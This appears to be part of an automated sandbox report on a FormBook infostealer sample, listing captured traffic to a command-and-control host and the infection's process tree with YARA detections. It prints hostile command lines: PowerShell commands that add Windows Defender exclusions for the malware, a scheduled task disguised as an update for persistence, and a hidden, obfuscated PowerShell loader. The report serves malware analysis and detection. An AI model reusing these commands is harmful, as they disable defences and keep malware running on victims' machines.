70 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	49754	66.96.162.149	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:30:12.771497965 CEST	1747	OUT	POST /mjuo/ HTTP/1.1 Host: www.leadchanges.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1247 Origin: http://www.leadchanges.info Referer: http://www.leadchanges.info/mjuo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 4c 57 69 62 72 6a 6f 48 56 6b 74 36 35 30 6a 61 6e 4c 73 49 35 50 71 79 50 50 35 52 42 41 54 48 61 64 31 65 4c 4b 43 4d 76 44 36 4f 49 70 31 47 48 64 65 30 35 6f 48 53 36 42 42 78 78 4d 77 6a 7a 49 69 4e 61 31 4d 50 4b 44 74 74 41 4b 4d 66 7a 4e 79 51 68 70 34 6a 43 39 57 34 6d 37 47 2b 7a 38 54 4f 6d 57 64 39 5a 4f 35 44 6a 57 54 2b 67 33 49 74 57 33 48 46 37 54 79 73 54 32 71 47 69 79 4d 64 42 6a 6f 4c 4c 4d 57 75 2b 6d 76 52 56 48 36 32 30 30 6d 6c 42 6b 61 51 79 7a 6b 73 78 4f 30 37 55 77 31 49 6f 4f 32 50 4c 54 5a 30 64 37 30 36 71 50 44 61 62 6f 67 7a 51 34 71 61 4b 66 4d 46 57 6d 4c 36 4a 47 67 68 55 64 51 78 4f 31 6f 51 69 76 38 67 45 7a 68 65 37 78 38 73 4b 33 42 2b 78 78 49 69 6c 48 34 35 2b 41 6d 44 6d 37 71 6e 30 56 44 6f 52 6e 58 4c 54 2f 43 68 52 34 76 74 47 4c 38 41 65 55 48 66 78 45 58 35 69 64 43 38 56 74 46 45 49 68 41 37 71 62 4a 45 45 46 42 53 6e 61 59 34 47 79 32 6d 63 36 62 59 4b 58 6c 45 36 43 46 77 36 74 61 4b 67 52 66 42 79 34 52 36 6b 30 68 67 43 55 42 33 4e 48 32 [TRUNCATED] Data Ascii: 9d=LWibrjoHVkt650janLsI5PqyPP5RBATHad1eLKCMvD6OIp1GHde05oHS6BBxxMwjzIiNa1MPKDttAKMfzNyQhp4jC9W4m7G+z8TOmWd9ZO5DjWT+g3ItW3HF7TysT2qGiyMdBjoLLMWu+mvRVH6200mlBkaQyzksxO07Uw1IoO2PLTZ0d706qPDabogzQ4qaKfMFWmL6JGghUdQxO1oQiv8gEzhe7x8sK3B+xxIilH45+AmDm7qn0VDoRnXLT/ChR4vtGL8AeUHfxEX5idC8VtFEIhA7qbJEEFBSnaY4Gy2mc6bYKXlE6CFw6taKgRfBy4R6k0hgCUB3NH25tiJVBtoVKfLUR1JZORPho7Fu7NvRNHWEyorm5rQTFUkWlTbrQLaEDV/SsXoDO9VbxRHQuQLtJ9BLgkrTIiOczAjmBzpMrwViSH0ev6+xD79L7RH5eKyjmw4hKczWVWw/9MYk4QczfOQwxi30jFAJm9Up2Fy0/DhznKqS8uNKs1YoasFZ4o0rkyX/QV4FUbIRRXmVWm5A3doHx3Vixdb6rUcVzvXV0sZHWXPFLb/Q/iDMX/HEkPh6A9oiTw8dKXDS4fhFtFz7iG0J/lCOWpj7VLOR/ENQdMyRIav9SX71DF+kKGP5WW9AP5DJHhBbtu1j6669bw6tHENWKEnSkey94iPKPMBwyi2x7625LYSmJ7bTOjkxPOB94v2+pE9/TncmNcj60e/5im/s9WhQwP6omhJCNUyfN+QPOA2WvwkvcNDOCoAEBVUNy8NlPYxzIunZQdQORXNAnTNlU4KN3M4/FnHdsQ+yqkJvePDgeVK3C854P0aFHjJg1P+3QK6M0etJWl9KZuQwIWSEYUgiYdXQSGrFPYM4InD3GnfufSkqobIG1GpeFBNxuYz2nLs/bdOy05nNFdgRO/3f0jhAojVRtFROnj8AF2kIUeTIpbNw1/Rxqh1jacq9X8T5RwTzExjevJvBTEUahIma018lA6njZ7lkClVTTODKg [TRUNCATED]
Jun 5, 2024 18:30:13.450958014 CEST	1087	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 16:30:13 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.7	49755	66.96.162.149	80

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:30:16.925648928 CEST	451	OUT	GET /mjuo/?9d=GUK7oVIRF3FAoVisjIpZqa7HO+54FDT9CfoAB53ViUuzbZ1TAtWa7LnCzENP06w/wd6reHxcMz42RIoq6sWsgYEYCrnoxIy0wOTor1QdDe9x8GrLmxcBWSK4ygqmUmz0vTBYLSkIKLnt&G0a=VFN0vBc0ol1ljnb0 HTTP/1.1 Host: www.leadchanges.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Jun 5, 2024 18:30:19.611146927 CEST	1087	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 16:30:19 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 2 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Target ID:	1
Start time:	12:26:07
Start date:	05/06/2024
Path:	C:\Users\user\Desktop\P1 HWT623ATG.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\P1 HWT623ATG.bat.exe"
Imagebase:	0xdd0000
File size:	753'664 bytes
MD5 hash:	CFD86B8016C2604EA4B9CF22E6316E22
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	3
Start time:	12:26:09
Start date:	05/06/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P1 HWT623ATG.bat.exe"
Imagebase:	0x240000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	12:26:09
Start date:	05/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	12:26:09
Start date:	05/06/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe"
Imagebase:	0x240000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	12:26:09
Start date:	05/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	12:26:09
Start date:	05/06/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GnVIdcfKFYG" /XML "C:\Users\user\AppData\Local\Temp\tmpC293.tmp"
Imagebase:	0xe60000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	8
Start time:	12:26:09
Start date:	05/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	9
Start time:	12:26:09
Start date:	05/06/2024
Path:	C:\Users\user\Desktop\P1 HWT623ATG.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\P1 HWT623ATG.bat.exe"
Imagebase:	0x5c0000
File size:	753'664 bytes
MD5 hash:	CFD86B8016C2604EA4B9CF22E6316E22
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1575209433.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1575209433.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1575852421.0000000000BD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1575852421.0000000000BD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1578650551.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1578650551.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Target ID:	10
Start time:	12:26:10
Start date:	05/06/2024
Path:	C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe
Imagebase:	0x1a0000
File size:	753'664 bytes
MD5 hash:	CFD86B8016C2604EA4B9CF22E6316E22
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs
Reputation:	low
Has exited:	true

Target ID:	13
Start time:	12:26:13
Start date:	05/06/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	19
Start time:	12:26:17
Start date:	05/06/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GnVIdcfKFYG" /XML "C:\Users\user\AppData\Local\Temp\tmpDBA9.tmp"
Imagebase:	0xe60000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	22
Start time:	12:26:17
Start date:	05/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	23
Start time:	12:26:17
Start date:	05/06/2024
Path:	C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe"
Imagebase:	0x650000
File size:	753'664 bytes
MD5 hash:	CFD86B8016C2604EA4B9CF22E6316E22
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	25
Start time:	14:02:11
Start date:	05/06/2024
Path:	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe"
Imagebase:	0x50000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.3719927203.0000000002350000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.3719927203.0000000002350000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Target ID:	26
Start time:	14:02:13
Start date:	05/06/2024
Path:	C:\Windows\SysWOW64\compact.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\compact.exe"
Imagebase:	0x190000
File size:	41'472 bytes
MD5 hash:	5CB107F69062D6D387F4F7A14737220E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001A.00000002.3719971214.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001A.00000002.3719971214.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001A.00000002.3709324958.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001A.00000002.3709324958.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001A.00000002.3719882402.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001A.00000002.3719882402.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Target ID:	27
Start time:	14:02:26
Start date:	05/06/2024
Path:	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe"
Imagebase:	0x50000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000002.3723441735.0000000005130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000002.3723441735.0000000005130000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Has exited:	false

Target ID:	30
Start time:	14:02:43
Start date:	05/06/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	34
Start time:	14:04:14
Start date:	05/06/2024
Path:	C:\Users\user\AppData\Local\Temp\bfc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\bfc.exe"
Imagebase:	0x400000
File size:	1'561'888 bytes
MD5 hash:	9468614D3915F76CE938B93A123E9043
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 11%, ReversingLabs
Has exited:	true

Target ID:	35
Start time:	14:04:17
Start date:	05/06/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$Algolagnic=Get-Content 'C:\Users\user\AppData\Local\erindres\keres\Renowned.tha';$Gnaskerierne=$Algolagnic.SubString(53079,3);.$Gnaskerierne($Algolagnic)"
Imagebase:	0x240000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	36
Start time:	14:04:17
Start date:	05/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	37
Start time:	14:04:18
Start date:	05/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	40
Start time:	14:05:51
Start date:	05/06/2024
Path:	C:\Users\user\AppData\Local\Temp\Smilet.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\Smilet.exe"
Imagebase:	0x400000
File size:	1'561'888 bytes
MD5 hash:	9468614D3915F76CE938B93A123E9043
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000028.00000002.3709150978.0000000003F84000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 11%, ReversingLabs
Has exited:	false